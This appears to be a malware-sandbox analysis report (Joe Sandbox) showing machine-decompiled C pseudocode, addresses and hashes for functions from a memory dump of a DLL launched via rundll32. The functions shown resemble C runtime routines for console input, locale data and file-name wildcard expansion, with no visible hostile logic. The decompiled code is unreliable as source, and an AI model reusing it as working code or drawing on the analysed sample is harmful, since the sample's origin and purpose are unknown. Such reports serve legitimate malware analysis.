												goto L40;
											}
											 *((intOrPtr*)(E1002449E(__eflags))) = 9;
											 *(E1002448B(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E1003973E();
												} else {
													_t170 = E10039AA6();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E1003994F(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
									 *(E1002448B(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E100268B3(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E1002448B(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E1002448B(_t246)) =  *_t197 & 0x00000000;
					_t139 = E1002449E(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x10039c3e
0x10039c42
0x10039c45
0x10039c5f
0x10039c61
0x10039fc6
0x10039fc6
0x10039fcb
0x10039fcb
0x10039fd3
0x10039fd9
0x10039fd9
0x00000000
0x10039fd9
0x10039c67
0x10039c6d
0x00000000
0x00000000
0x10039c77
0x10039c7d
0x10039c80
0x10039c83
0x10039c8d
0x10039c90
0x10039c93
0x10039c97
0x10039c99
0x00000000
0x00000000
0x10039c9f
0x10039ca2
0x10039ca8
0x10039cc2
0x10039cc4
0x10039fc2
0x00000000
0x10039fc2
0x10039cca
0x10039ccd
0x00000000
0x00000000
0x10039cd3
0x10039cd7
0x00000000
0x00000000
0x10039cdd
0x10039ce0
0x10039ce4
0x10039ceb
0x10039ced
0x10039ced
0x10039cf0
0x10039d45
0x10039d47
0x10039d0d
0x10039d12
0x10039d19
0x10039d1f
0x00000000
0x10039d49
0x10039d4b
0x10039d4c
0x10039d4e
0x10039d51
0x10039d53
0x10039d55
0x10039d57
0x10039d57
0x10039d62
0x10039d64
0x10039d6b
0x10039d70
0x10039d73
0x10039d76
0x10039d78
0x10039d9c
0x10039da4
0x10039da7
0x10039dae
0x10039db5
0x10039db9
0x10039dbb
0x10039dbe
0x10039dc5
0x10039dc5
0x10039dc8
0x10039dca
0x10039dcd
0x10039dd2
0x10039dd5
0x10039dde
0x10039de2
0x10039de5
0x10039de7
0x10039ded
0x10039def
0x10039df8
0x10039df9
0x10039dfb
0x10039dff
0x10039e00
0x10039e04
0x10039e07
0x10039e11
0x10039e16
0x10039e19
0x10039e28
0x10039e2c
0x10039e2f
0x10039e31
0x10039e33
0x10039e35
0x10039e3a
0x10039e3c
0x10039e40
0x10039e41
0x10039e47
0x10039e51
0x10039e52
0x10039e55
0x10039e5a
0x10039e5d
0x10039e6c
0x10039e70
0x10039e73
0x10039e75
0x10039e77
0x10039e79
0x10039e7b
0x10039e81
0x10039e81
0x10039e82
0x10039e91
0x10039e94
0x10039e95
0x10039e95
0x10039e79
0x10039e75
0x10039e5d
0x10039e35
0x10039e31
0x10039e19
0x10039def
0x10039de7
0x10039e9b
0x10039ea1
0x10039ea3
0x10039f16
0x10039f16
0x10039f1a
0x10039f2a
0x10039f30
0x10039f32
0x10039f8e
0x10039f8e
0x10039f96
0x10039f97
0x10039f99
0x10039fb2
0x10039fb5
0x10039ef2
0x10039ef3
0x00000000
0x10039ef8
0x10039fbb
0x00000000
0x10039fbb
0x10039fa0
0x10039fab
0x00000000
0x10039fab
0x10039f34
0x10039f37
0x10039f3a
0x00000000
0x00000000
0x10039f3c
0x10039f3c
0x10039f3f
0x10039f42
0x10039f45
0x10039f4c
0x10039f51
0x10039f53
0x10039f57
0x10039f72
0x10039f76
0x10039f77
0x10039f7a
0x10039f7b
0x10039f87
0x10039f7d
0x10039f7d
0x10039f7d
0x10039f59
0x10039f59
0x10039f59
0x10039f64
0x10039f69
0x10039f6c
0x10039f6c
0x00000000
0x10039f51
0x10039ea8
0x10039eab
0x10039eb2
0x10039eb7
0x00000000
0x00000000
0x10039ec0
0x10039ec6
0x10039ec8
0x00000000
0x00000000
0x10039eca
0x10039ece
0x00000000
0x00000000
0x10039ee2
0x10039ee8
0x10039eea
0x10039f0e
0x10039f11
0x00000000
0x10039f11
0x10039eec
0x00000000
0x10039d7a
0x10039d7f
0x10039d8a
0x10039ef9
0x10039ef9
0x10039ef9
0x10039efc
0x10039efd
0x00000000
0x10039f05
0x10039d78
0x10039d47
0x10039cf2
0x10039cf5
0x10039d09
0x10039d0b
0x10039d2c
0x10039d2f
0x10039d32
0x10039d35
0x00000000
0x10039d35
0x00000000
0x10039cf7
0x10039cf7
0x10039cfa
0x10039cfd
0x00000000
0x10039cfd
0x10039cf5
0x10039caa
0x10039caf
0x10039cb7
0x00000000
0x10039c47
0x10039c4c
0x10039c4f
0x10039c54
0x10039fde
0x00000000
0x10039fde

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction ID: 06d7e98826e9061cf5f9f575d1909f9ed043f22c31c120a23b2795546a4967bb
Opcode Fuzzy Hash: 14334cd124f7857333d6a87dc4dbb4beeafbf5ac604f7dd62759596a9d004c8b
Instruction Fuzzy Hash: E1C1D074A04259AFEB02DF98C981BADBBF4EF4A351F114159E905EF392C734AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002F19F, Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E1002F19F(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E10026850(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E10024214(4);
						_t120 = 0;
						_v8 = _t125;
						E100268B3(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x1004d788; // 0x1004d7dc
								 *_t93 = _t53;
								_t54 =  *0x1004d78c; // 0x1004e868
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x1004d790; // 0x1004e868
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x1004d7b8; // 0x1004d7e0
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x1004d7bc; // 0x1004e86c
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E10024214(4);
							_v12 = _t121;
							E100268B3(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t123 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t69 = E10037D5C(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t74 = E10037D5C(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18);
								_t77 = E10037D5C(_t113,  &_v24, 2, _t122, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E10037D5C(_t113,  &_v24, 2, _t122, 0xf, _t22) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E1002F136(_t93);
								E100268B3(_t93);
								E100268B3(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E100268B3(_v8);
								return _v16;
							}
							E100268B3();
							goto L12;
						}
						E100268B3(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x1004d788;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E100268B3( *((intOrPtr*)(_t123 + 0x7c)));
							E100268B3( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x1002f19f
0x1002f1a9
0x1002f1af
0x1002f1b2
0x1002f1bb
0x1002f1da
0x1002f1e2
0x1002f1e8
0x1002f1fb
0x1002f1fc
0x1002f205
0x1002f207
0x1002f20a
0x1002f20d
0x1002f216
0x1002f227
0x1002f229
0x1002f232
0x1002f381
0x1002f386
0x1002f388
0x1002f38d
0x1002f390
0x1002f395
0x1002f398
0x1002f39d
0x1002f3a0
0x1002f3a5
0x1002f314
0x1002f31a
0x1002f31e
0x1002f320
0x1002f320
0x00000000
0x1002f31e
0x1002f23f
0x1002f243
0x1002f246
0x1002f24d
0x1002f250
0x1002f25d
0x1002f263
0x1002f269
0x1002f26b
0x1002f26c
0x1002f26e
0x1002f26f
0x1002f274
0x1002f283
0x1002f28a
0x1002f297
0x1002f2ab
0x1002f2b5
0x1002f2cc
0x1002f2f8
0x1002f308
0x1002f308
0x1002f30c
0x00000000
0x00000000
0x1002f2fd
0x1002f2fd
0x1002f303
0x1002f36f
0x1002f307
0x1002f307
0x00000000
0x1002f307
0x1002f371
0x1002f373
0x1002f373
0x1002f376
0x1002f378
0x1002f37b
0x00000000
0x1002f37f
0x1002f305
0x00000000
0x1002f305
0x1002f30e
0x1002f311
0x00000000
0x1002f311
0x1002f2cf
0x1002f2d5
0x1002f2dd
0x1002f2e5
0x1002f2e9
0x1002f2ed
0x00000000
0x1002f2f5
0x1002f252
0x00000000
0x1002f257
0x1002f219
0x00000000
0x1002f221
0x00000000
0x1002f1c5
0x1002f1c5
0x1002f1c7
0x1002f1ca
0x1002f322
0x1002f322
0x1002f32a
0x1002f32c
0x1002f32c
0x1002f334
0x1002f339
0x1002f33d
0x1002f342
0x1002f34d
0x1002f353
0x1002f33d
0x1002f357
0x1002f35c
0x1002f362
0x00000000
0x1002f362

APIs

_free.LIBCMT ref: 1002F20D
_free.LIBCMT ref: 1002F219
_free.LIBCMT ref: 1002F342
_free.LIBCMT ref: 1002F34D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e72b2000ea6275254dec66e37fb39df4ccb8ac4d77d9a4d80c0119116b12df20
Instruction ID: d13b4a520b74060ec193128ac1be29b222bffbea19a5bef822ff00477154d023
Opcode Fuzzy Hash: e72b2000ea6275254dec66e37fb39df4ccb8ac4d77d9a4d80c0119116b12df20
Instruction Fuzzy Hash: 9F61E5759003059FE720DF64EC41BAAB7F8EF49790FA1416EE959EB241EB70AD04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10026AD8, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10026AD8(void* __esi, signed int _a4, signed int* _a8) {
				signed int _v0;
				intOrPtr _v4;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short _v18;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v56;
				signed int _v60;
				signed int _v68;
				signed int* _v72;
				signed int _v84;
				signed int* _v100;
				signed int _v112;
				intOrPtr* _v160;
				intOrPtr* _v200;
				intOrPtr* _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				signed int _v252;
				struct _WIN32_FIND_DATAW _v616;
				char _v617;
				intOrPtr* _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				signed int _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				signed int _v676;
				union _FINDEX_INFO_LEVELS _v680;
				union _FINDEX_INFO_LEVELS _v684;
				intOrPtr _v852;
				void* __ebp;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int _t254;
				signed int _t255;
				intOrPtr* _t266;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				signed int _t279;
				signed int _t281;
				signed int _t286;
				signed int _t289;
				char _t291;
				signed char _t292;
				signed int _t298;
				union _FINDEX_INFO_LEVELS _t302;
				signed int _t308;
				union _FINDEX_INFO_LEVELS _t311;
				intOrPtr* _t319;
				signed int _t322;
				intOrPtr _t327;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				intOrPtr _t344;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int* _t352;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t360;
				signed int* _t361;
				signed int _t364;
				signed int _t366;
				void* _t369;
				void* _t372;
				union _FINDEX_INFO_LEVELS _t373;
				signed int _t376;
				signed int* _t378;
				signed int* _t381;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t397;
				intOrPtr* _t398;
				signed int _t403;
				intOrPtr* _t404;
				signed int _t406;
				void* _t408;
				intOrPtr* _t409;
				signed int _t412;
				intOrPtr* _t415;
				signed int _t420;
				signed int _t426;
				signed int _t428;
				intOrPtr* _t439;
				signed int _t442;
				short _t443;
				signed int _t448;
				intOrPtr* _t449;
				signed int _t457;
				signed int _t459;
				intOrPtr* _t460;
				signed int _t465;
				void* _t466;
				void* _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t480;
				signed int _t482;
				intOrPtr _t483;
				signed int _t485;
				signed int* _t490;
				signed int _t491;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t497;
				signed int* _t498;
				signed int _t499;
				signed int _t501;
				signed int _t502;
				signed int _t505;
				void* _t506;
				intOrPtr _t507;
				void* _t508;
				signed int _t511;
				signed int _t516;
				void* _t517;
				void* _t518;
				signed int _t519;
				void* _t520;
				void* _t521;
				signed int _t522;
				void* _t523;
				void* _t524;
				void* _t525;
				signed int _t526;
				void* _t527;
				void* _t528;

				_t216 = _a8;
				_t521 = _t520 - 0x28;
				_t532 = _t216;
				if(_t216 != 0) {
					_t490 = _a4;
					_t364 = 0;
					 *_t216 = 0;
					_t476 = 0;
					_t217 =  *_t490;
					_t381 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t217;
					if(_t217 == 0) {
						L9:
						_v8 = _t364;
						_t219 = _t381 - _t476;
						_t491 = _t476;
						_v12 = _t491;
						_t456 = (_t219 >> 2) + 1;
						_t221 = _t219 + 3 >> 2;
						__eflags = _t381 - _t491;
						_v16 = (_t219 >> 2) + 1;
						asm("sbb esi, esi");
						_t493 =  !_t491 & _t219 + 0x00000003 >> 0x00000002;
						__eflags = _t493;
						if(_t493 != 0) {
							_t355 = _t476;
							_t473 = _t364;
							do {
								_t449 =  *_t355;
								_t20 = _t449 + 1; // 0x1
								_v20 = _t20;
								do {
									_t357 =  *_t449;
									_t449 = _t449 + 1;
									__eflags = _t357;
								} while (_t357 != 0);
								_t364 = _t364 + 1 + _t449 - _v20;
								_t355 = _v12 + 4;
								_t473 = _t473 + 1;
								_v12 = _t355;
								__eflags = _t473 - _t493;
							} while (_t473 != _t493);
							_t456 = _v16;
							_v8 = _t364;
							_t364 = 0;
							__eflags = 0;
						}
						_t494 = E10010F75(_t221, _t456, _v8, 1);
						_t522 = _t521 + 0xc;
						__eflags = _t494;
						if(_t494 != 0) {
							_v12 = _t476;
							_t224 = _t494 + _v16 * 4;
							_t382 = _t224;
							_v28 = _t224;
							_t225 = _t476;
							_v16 = _t224;
							__eflags = _t225 - _v40;
							if(_t225 == _v40) {
								L24:
								_v12 = _t364;
								 *_a8 = _t494;
								_t495 = _t364;
								goto L25;
							} else {
								_t459 = _t494 - _t476;
								__eflags = _t459;
								_v32 = _t459;
								do {
									_t235 =  *_t225;
									_t460 = _t235;
									_v24 = _t235;
									_v20 = _t460 + 1;
									do {
										_t237 =  *_t460;
										_t460 = _t460 + 1;
										__eflags = _t237;
									} while (_t237 != 0);
									_t461 = _t460 - _v20;
									_t238 = _t460 - _v20 + 1;
									_push(_t238);
									_v20 = _t238;
									_t242 = E100315C1(_t382, _v28 - _t382 + _v8, _v24);
									_t522 = _t522 + 0x10;
									__eflags = _t242;
									if(_t242 != 0) {
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										_push(_t364);
										E1000E341();
										asm("int3");
										_t516 = _t522;
										_t523 = _t522 - 0x34;
										_t244 =  *0x1004d054; // 0xd94e5c04
										_v84 = _t244 ^ _t516;
										_t246 = _v68;
										_v112 = _t246;
										_push(_t494);
										_t498 = _v72;
										_v100 = _t498;
										__eflags = _t246;
										if(__eflags != 0) {
											_push(_t364);
											_push(_t476);
											_t478 = 0;
											 *_t246 = 0;
											_t366 = 0;
											_t247 =  *_t498;
											_t388 = 0;
											_v616.cAlternateFileName = 0;
											_v48 = 0;
											_v44 = 0;
											__eflags = _t247;
											if(_t247 == 0) {
												L42:
												_v24 = _t478;
												_t249 = _t388 - _t366;
												_t499 = _t366;
												_v28 = _t499;
												_t464 = (_t249 >> 2) + 1;
												_t251 = _t249 + 3 >> 2;
												__eflags = _t388 - _t499;
												_v36 = (_t249 >> 2) + 1;
												asm("sbb esi, esi");
												_t501 =  !_t499 & _t249 + 0x00000003 >> 0x00000002;
												__eflags = _t501;
												if(_t501 != 0) {
													_t342 = _t366;
													_t470 = _t478;
													do {
														_t439 =  *_t342;
														_t87 = _t439 + 2; // 0x2
														_v32 = _t87;
														do {
															_t344 =  *_t439;
															_t439 = _t439 + 2;
															__eflags = _t344 - _t478;
														} while (_t344 != _t478);
														_v24 = _v24 + 1 + (_t439 - _v32 >> 1);
														_t342 = _v28 + 4;
														_t470 = _t470 + 1;
														_v28 = _t342;
														__eflags = _t470 - _t501;
													} while (_t470 != _t501);
													_t464 = _v36;
												}
												_t502 = E10010F75(_t251, _t464, _v24, 2);
												_t524 = _t523 + 0xc;
												__eflags = _t502;
												if(_t502 != 0) {
													_v28 = _t366;
													_t254 = _t502 + _v36 * 4;
													_t465 = _t254;
													_v60 = _t254;
													_t255 = _t366;
													_v36 = _t465;
													__eflags = _t255 - _v48;
													if(_t255 == _v48) {
														L57:
														_v24 = _t478;
														 *_v40 = _t502;
														_t503 = _t478;
														goto L58;
													} else {
														_t397 = _t502 - _t366;
														__eflags = _t397;
														_v20 = _t397;
														do {
															_t266 =  *_t255;
															_t398 = _t266;
															_v56 = _t266;
															_v32 = _t398 + 2;
															do {
																_t268 =  *_t398;
																_t398 = _t398 + 2;
																__eflags = _t268 - _t478;
															} while (_t268 != _t478);
															_t269 = (_t398 - _v32 >> 1) + 1;
															_push(_t269);
															_v32 = _t269;
															_t403 = _t465 - _v60 >> 1;
															_t272 = E1002FBCB(_t465, _v24 - _t403, _v56);
															_t524 = _t524 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																_push(_t478);
																E1000E341();
																asm("int3");
																_push(_t516);
																_t517 = _t524;
																_push(_t403);
																_t404 = _v160;
																_t136 = _t404 + 1; // 0x1
																_t466 = _t136;
																do {
																	_t274 =  *_t404;
																	_t404 = _t404 + 1;
																	__eflags = _t274;
																} while (_t274 != 0);
																_push(_t478);
																_t480 = _a4;
																_t406 = _t404 - _t466 + 1;
																_v16 = _t406;
																__eflags = _t406 -  !_t480;
																if(_t406 <=  !_t480) {
																	_push(_t366);
																	_t139 = _t480 + 1; // 0x1
																	_t369 = _t139 + _t406;
																	_t506 = E10026850(_t369, 1);
																	_t408 = _t502;
																	__eflags = _t480;
																	if(_t480 == 0) {
																		L73:
																		_push(_v16);
																		_t369 = _t369 - _t480;
																		_t279 = E100315C1(_t506 + _t480, _t369, _v4);
																		_t525 = _t524 + 0x10;
																		__eflags = _t279;
																		if(_t279 != 0) {
																			goto L78;
																		} else {
																			_t378 = _a8;
																			_t335 = E100278B8(_t378);
																			_v16 = _t335;
																			__eflags = _t335;
																			if(_t335 == 0) {
																				 *(_t378[1]) = _t506;
																				_t511 = 0;
																				_t148 =  &(_t378[1]);
																				 *_t148 = _t378[1] + 4;
																				__eflags =  *_t148;
																			} else {
																				E100268B3(_t506);
																				_t511 = _v16;
																			}
																			E100268B3(0);
																			_t338 = _t511;
																			goto L70;
																		}
																	} else {
																		_push(_t480);
																		_t340 = E100315C1(_t506, _t369, _v0);
																		_t525 = _t524 + 0x10;
																		__eflags = _t340;
																		if(_t340 != 0) {
																			L78:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E1000E341();
																			asm("int3");
																			_push(_t517);
																			_t518 = _t525;
																			_push(_t408);
																			_t409 = _v200;
																			_push(_t369);
																			_push(0);
																			__eflags = 0;
																			_t151 = _t409 + 2; // 0x2
																			_t467 = _t151;
																			do {
																				_t281 =  *_t409;
																				_t409 = _t409 + 2;
																				__eflags = _t281;
																			} while (_t281 != 0);
																			_t482 = _v0;
																			_t412 = (_t409 - _t467 >> 1) + 1;
																			_v20 = _t412;
																			__eflags = _t412 -  !_t482;
																			if(_t412 <=  !_t482) {
																				_push(_t506);
																				_t154 = _t482 + 1; // 0x1
																				_t372 = _t154 + _t412;
																				_t507 = E10026850(_t372, 2);
																				__eflags = _t482;
																				if(_t482 == 0) {
																					L86:
																					_push(_v20);
																					_t372 = _t372 - _t482;
																					_t286 = E1002FBCB(_t507 + _t482 * 2, _t372, _v8);
																					_t526 = _t525 + 0x10;
																					__eflags = _t286;
																					if(_t286 != 0) {
																						goto L91;
																					} else {
																						_t485 = _a4;
																						_t376 = E1002793F(_t485);
																						__eflags = _t376;
																						if(_t376 == 0) {
																							 *((intOrPtr*)( *((intOrPtr*)(_t485 + 4)))) = _t507;
																							 *((intOrPtr*)(_t485 + 4)) =  *((intOrPtr*)(_t485 + 4)) + 4;
																							_t376 = 0;
																							__eflags = 0;
																						} else {
																							E100268B3(_t507);
																						}
																						E100268B3(0);
																						_t332 = _t376;
																						goto L83;
																					}
																				} else {
																					_push(_t482);
																					_t334 = E1002FBCB(_t507, _t372, _v4);
																					_t526 = _t525 + 0x10;
																					__eflags = _t334;
																					if(_t334 != 0) {
																						L91:
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						_push(0);
																						E1000E341();
																						asm("int3");
																						_push(_t518);
																						_t519 = _t526;
																						_t527 = _t526 - 0x298;
																						_t289 =  *0x1004d054; // 0xd94e5c04
																						_v252 = _t289 ^ _t519;
																						_t415 = _v236;
																						_t468 = _v232;
																						_push(_t372);
																						_push(_t482);
																						_t483 = _v240;
																						_v852 = _t468;
																						__eflags = _t415 - _t483;
																						if(_t415 != _t483) {
																							while(1) {
																								_t327 =  *_t415;
																								__eflags = _t327 - 0x2f;
																								if(_t327 == 0x2f) {
																									break;
																								}
																								__eflags = _t327 - 0x5c;
																								if(_t327 != 0x5c) {
																									__eflags = _t327 - 0x3a;
																									if(_t327 != 0x3a) {
																										_t415 = E10031610(_t483, _t415);
																										__eflags = _t415 - _t483;
																										if(_t415 != _t483) {
																											continue;
																										}
																									}
																								}
																								break;
																							}
																							_t468 = _v624;
																						}
																						_t291 =  *_t415;
																						_v617 = _t291;
																						__eflags = _t291 - 0x3a;
																						if(_t291 != 0x3a) {
																							L102:
																							_t373 = 0;
																							__eflags = _t291 - 0x2f;
																							if(__eflags == 0) {
																								L105:
																								_t292 = 1;
																							} else {
																								__eflags = _t291 - 0x5c;
																								if(__eflags == 0) {
																									goto L105;
																								} else {
																									__eflags = _t291 - 0x3a;
																									_t292 = 0;
																									if(__eflags == 0) {
																										goto L105;
																									}
																								}
																							}
																							_v684 = _t373;
																							_v680 = _t373;
																							_push(_t507);
																							asm("sbb eax, eax");
																							_v676 = _t373;
																							_v672 = _t373;
																							_v652 =  ~(_t292 & 0x000000ff) & _t415 - _t483 + 0x00000001;
																							_v668 = _t373;
																							_v664 = _t373;
																							_t298 = E10026A9E(_t415 - _t483 + 1, _t483,  &_v684, E100276E1(_t468, __eflags));
																							_t528 = _t527 + 0xc;
																							asm("sbb eax, eax");
																							_t302 = FindFirstFileExW( !( ~_t298) & _v676, _t373,  &_v616, _t373, _t373, _t373);
																							_t508 = _t302;
																							__eflags = _t508 - 0xffffffff;
																							if(_t508 != 0xffffffff) {
																								_t420 =  *((intOrPtr*)(_v624 + 4)) -  *_v624;
																								__eflags = _t420;
																								_v656 = _t420 >> 2;
																								do {
																									_v648 = _t373;
																									_v644 = _t373;
																									_v640 = _t373;
																									_v636 = _t373;
																									_v632 = _t373;
																									_v628 = _t373;
																									_t308 = E100269CF( &(_v616.cFileName),  &_v648,  &_v617, E100276E1(_t468, __eflags));
																									_t528 = _t528 + 0x10;
																									asm("sbb eax, eax");
																									_t311 =  !( ~_t308) & _v640;
																									__eflags =  *_t311 - 0x2e;
																									if( *_t311 != 0x2e) {
																										L113:
																										_push(_v624);
																										_push(_v652);
																										_push(_t483);
																										_push(_t311);
																										L66();
																										_t528 = _t528 + 0x10;
																										_v660 = _t311;
